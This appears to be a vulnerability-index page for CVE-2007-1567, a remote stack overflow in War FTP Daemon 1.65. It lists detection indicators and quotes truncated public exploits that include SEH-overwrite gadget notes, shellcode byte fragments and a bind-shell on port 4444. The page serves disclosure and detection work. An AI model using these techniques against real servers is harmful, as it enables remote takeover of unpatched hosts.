CVE-2007-1567
Published 2007-03-21
Priority: P3 · 55 · Severity: critical (CVSS 2.0 base score 10.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code indexed (see the Exploit-DB entries below)
EPSS: 50.55% (98.8th percentile)
Stack-based buffer overflow in War FTP Daemon 1.65, and possibly earlier, allows remote attackers to cause a denial of service or execute arbitrary code via unspecified vectors, as demonstrated by warftp_165.tar by Immunity. NOTE: this might be the same issue as CVE-1999-0256, CVE-2000-0131, or CVE-2006-2171, but due to Immunity's lack of details, this cannot be certain.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| war_ftp_daemon | war_ftp_daemon | <= 1.65 | — |
Detection & IOCs (extracted from sources)
- bytes: `\xeb\x06\x90\x90` (`jmp short +6` followed by two NOP bytes, the next-SEH pointer pattern described in the SEH-overwrite notes below)
- bytes: `\xa9\x11\x02\x75`
- Exploit uses the SEH overwrite technique with a pop/pop/ret gadget from ws2help.dll on Windows 2000 SP4; detect anomalous SEH chain overwrites in the WarFTP process.
- USER command shellcode must avoid the bytes 0x40 (@), 0x0A (\n), 0x0D (\r) and 0x00 (\0); alphanumeric or otherwise encoded shellcode in the FTP USER field is a strong exploit indicator.
- The EIP overwrite exploit (exploit-db/3474) uses a 'call ebp' gadget from user32.dll on Windows 2000 SP4; monitor for EIP control via this gadget in WarFTP crash analysis.
- JMP ESP return addresses are OS/SP-specific; the exploit includes hardcoded addresses for Windows XP SP0–SP2 and Windows 2000 SP0–SP3 (English and Spanish). Detection based on return addresses must account for all variants.
- The NVD notes this may be the same issue as CVE-1999-0256, CVE-2000-0131, or CVE-2006-2171; deduplication against those CVEs is required before creating separate detection rules.
No detection rules found.
Exploit-DB
WarFTP 1.65 - 'USER' Remote Buffer Overflow (exploitdb, 2007-03-25; truncated excerpt as indexed)
---
```c
#include
#include
#include
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #############################################################################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const c
```
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (exploitdb, 2007-03-15; truncated excerpt as indexed)
---
```
# ===============================================================================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite
# method. Pretty simple.
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Shellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
#
```
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (exploitdb, 2007-03-14; truncated excerpt as indexed)
---
```python
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x3
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/24494
- http://www.securityfocus.com/bid/22944
- http://www.vupen.com/english/advisories/2007/0933
- https://www.immunityinc.com/downloads/immpartners/warftp_165.tar